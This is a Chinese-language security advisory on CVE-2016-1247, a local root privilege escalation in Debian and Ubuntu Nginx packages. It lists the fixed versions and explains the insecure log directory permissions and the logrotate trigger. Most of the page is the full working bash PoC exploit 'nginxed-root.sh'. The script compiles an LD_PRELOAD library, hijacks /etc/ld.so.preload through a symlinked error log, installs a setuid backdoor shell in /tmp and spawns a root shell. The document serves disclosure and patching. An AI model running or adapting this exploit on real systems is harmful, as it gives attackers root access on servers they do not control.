漏洞发现人:Dawid Golunski
CVE编号 :CVE-2016-1247
发行日期 :15.11.2016
安全级别 :高
背景介绍
Nginx是一个高性能的HTTP和反向代理服务器,也是一个 IMAP/POP3/SMTP 代理服务器。 Nginx 是由 Igor Sysoev 为俄罗斯访问量第二的 Rambler.ru 站点开发的,第一个公开版本0.1.0发布于2004年10月4日。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、示例配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx 1.0.4发布。 Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个BSD-like 协议下发行。由俄罗斯的程序设计师Igor Sysoev所开发,其特点是占有内存少,并发能力强。
漏洞概要
Debian发行版的Nginx本地提权漏洞,该漏洞已经在1.6.2-5+deb8u3中修复
因为该漏洞细节是在官方修复后公布的,因此请低版本的Debian/ubuntu用户及时更新补丁:
补丁修复情况:
Debian:
在Nginx 1.6.2-5+deb8u3中修复
Ubuntu:
Ubuntu 16.04 LTS:
在1.10.0-0ubuntu0.16.04.3中修复
Ubuntu 14.04 LTS:
在1.4.6-1ubuntu3.6中修复
Ubuntu 16.10:
在1.10.1-0ubuntu1.1中修复
漏洞描述
Debian(Ubuntu)发行版的Nginx在新建日志目录的时,使用了不安全的权限,因此本地恶意攻击者可以从nginx/web用户权限(www-data)提升到ROOT。
漏洞细节
基于Debian系统默认安装的Nginx会在下面的路径使用下面的权限新建Nginx日志目录
1 2 3 4 5 | root@xenial:~# ls -ld /var/log/nginx/drwxr-x--- 2 www-data adm 4096 Nov 12 22:32 /var/log/nginx/root@xenial:~# ls -ld /var/log/nginx/*-rw-r----- 1 www-data adm 0 Nov 12 22:31 /var/log/nginx/access.log-rw-r--r-- 1 root root 0 Nov 12 22:47 /var/log/nginx/error.log |
我们可以看到/var/log/nginx目录的拥有者是www-data,因此本地攻击者可以通过符号链接到任意文件来替换日志文件,从而实现提权。
攻击者通过符号链接替换了了日志文件后,需要等nginx daemon重新打开日志文件,因此需要重启Nginx,或者nginx damon接受USR1进程信号。
这里亮点来了,USR1进程信号会在默认安装的Nginx通过logrotate脚本调用的do_rotate()函数自动触发。
--------[ /etc/logrotate.d/nginx ]--------
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | /var/log/nginx/*.log {dailymissingokrotate 52compressdelaycompressnotifemptycreate 0640 www-data admsharedscriptsprerotateif [ -d /etc/logrotate.d/httpd-prerotate ]; then \run-parts /etc/logrotate.d/httpd-prerotate; \fi \endscriptpostrotateinvoke-rc.d nginx rotate >/dev/null 2>&1endscript}[...]do_rotate() { start-stop-daemon --stop --signal USR1 --quiet --pidfile $PID --name $NAME return 0}[...] |
我们可以看到logrotation脚本会在corn中每天6:25AM自动调用,因此如果/etc/logrotate.d/nginx已经设置了'daily'日志回滚,攻击者将在不需要任何系统管理员交互的情况下,在24小时内实现提权到ROOT
漏洞验证截图
POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 | #!/bin/bash## Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit# nginxed-root.sh (ver. 1.0)## CVE-2016-1247## Discovered and coded by:## Dawid Golunski# dawid[at]legalhackers.com## https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory.## ---# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu# etc.) to escalate their privileges from nginx web server user (www-data) to root # through unsafe error log handling.## The exploit waits for Nginx server to be restarted or receive a USR1 signal.# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)# script which is called daily by the cron.daily on default installations.# The restart should take place at 6:25am which is when cron.daily executes.# Attackers can therefore get a root shell automatically in 24h at most without any admin# interaction just by letting the exploit run till 6:25am assuming that daily logrotation # has been configured. ### Exploit usage:# ./nginxed-root.sh path_to_nginx_error.log ## To trigger logrotation for testing the exploit, you can run the following command:## /usr/sbin/logrotate -vf /etc/logrotate.d/nginx## See the full advisory for details at:# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html## Video PoC:# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html### Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/nginxrootsh"PRIVESCLIB="/tmp/privesclib.so"PRIVESCSRC="/tmp/privesclib.c"SUIDBIN="/usr/bin/sudo"function cleanexit {# Cleanup echo -e "\n[+] Cleaning up..."rm -f $PRIVESCSRCrm -f $PRIVESCLIBrm -f $ERRORLOGtouch $ERRORLOGif [ -f /etc/ld.so.preload ]; thenecho -n > /etc/ld.so.preloadfiecho -e "\n[+] Job done. Exiting with code $1 \n"exit $1}function ctrl_c() { echo -e "\n[+] Ctrl+C pressed"cleanexit 0}#intro cat <<_eascii_ _______________________________< Is your server (N)jinxed ? ;o > ------------------------------- \ \ __---__ _- /--______ __--( / \ )XXXXXXXXXXX\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\ /XXXXX( )--_ XXXXXXXXXXX\ /XXXXX/ ( O ) XXXXXX \XXXXX\ XXXXX/ / XXXXXX \__ \XXXXX XXXXXX__/ XXXXXX \__----> ---___ XXX__/ XXXXXX \__ / \- --__/ ___/\ XXXXXX / ___--/= \-\ ___/ XXXXXX '--- XXXXXX \-\/XXX\ XXXXXX /XXXXX \XXXXXXXXX \ /XXXXX/ \XXXXXX > _/XXXXX/ \XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV""_eascii_echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"# Argsif [ $# -lt 1 ]; thenecho -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"exit 3fi# Priv checkecho -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"id | grep -q www-dataif [ $? -ne 0 ]; thenecho -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"exit 3fi# Set target pathsERRORLOG="$1"if [ ! -f $ERRORLOG ]; thenecho -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"exit 3fi# [ Exploitation ]trap ctrl_c INT# Compile privesc preload libraryecho -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"cat <<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h>uid_t geteuid(void) {static uid_t (*old_geteuid)();old_geteuid = dlsym(RTLD_NEXT, "geteuid");if ( old_geteuid() == 0 ) {chown("$BACKDOORPATH", 0, 0);chmod("$BACKDOORPATH", 04777);unlink("/etc/ld.so.preload");}return old_geteuid();}_solibeof_/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"if [ $? -ne 0 ]; thenecho -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."cleanexit 2;fi# Prepare backdoor shellcp $BACKDOORSH $BACKDOORPATHecho -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"# Safety checkif [ -f /etc/ld.so.preload ]; thenecho -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."exit 2fi# Symlink the log filerm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOGif [ $? -ne 0 ]; thenecho -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."cleanexit 3fiecho -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"# Make sure the nginx access.log contains at least 1 line for the logrotation to get triggeredcurl http://localhost/ >/dev/null 2>/dev/null# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily # rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."while :; do sleep 1if [ -f /etc/ld.so.preload ]; thenecho $PRIVESCLIB > /etc/ld.so.preloadrm -f $ERRORLOGbreak;fidone# /etc/ld.so.preload should be owned by www-data user at this point# Inject the privesc.so shared library to escalate privilegesecho $PRIVESCLIB > /etc/ld.so.preloadecho -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"chmod 755 /etc/ld.so.preload# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"sudo 2>/dev/null >/dev/null# Check for the rootshellls -l $BACKDOORPATHls -l $BACKDOORPATH | grep rws | grep -q rootif [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"elseecho -e "\n[!] Failed to get root"cleanexit 2firm -f $ERRORLOGecho > $ERRORLOG# Use the rootshell to perform cleanup that requires root privilges$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"# Reset the logging to error.log$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"# Execute the rootshellecho -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"$BACKDOORPATH -p -i# Job done.cleanexit 0:Debian、ubuntu发行版的Nginx本地提权漏洞(含POC) |
修复方案
升级为最新的Nginx软件包
https://www.debian.org/security/2016/dsa-3701
https://www.ubuntu.com/usn/usn-3114-1/
参考链接
http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
本文暂时没有评论,来添加一个吧(●'◡'●)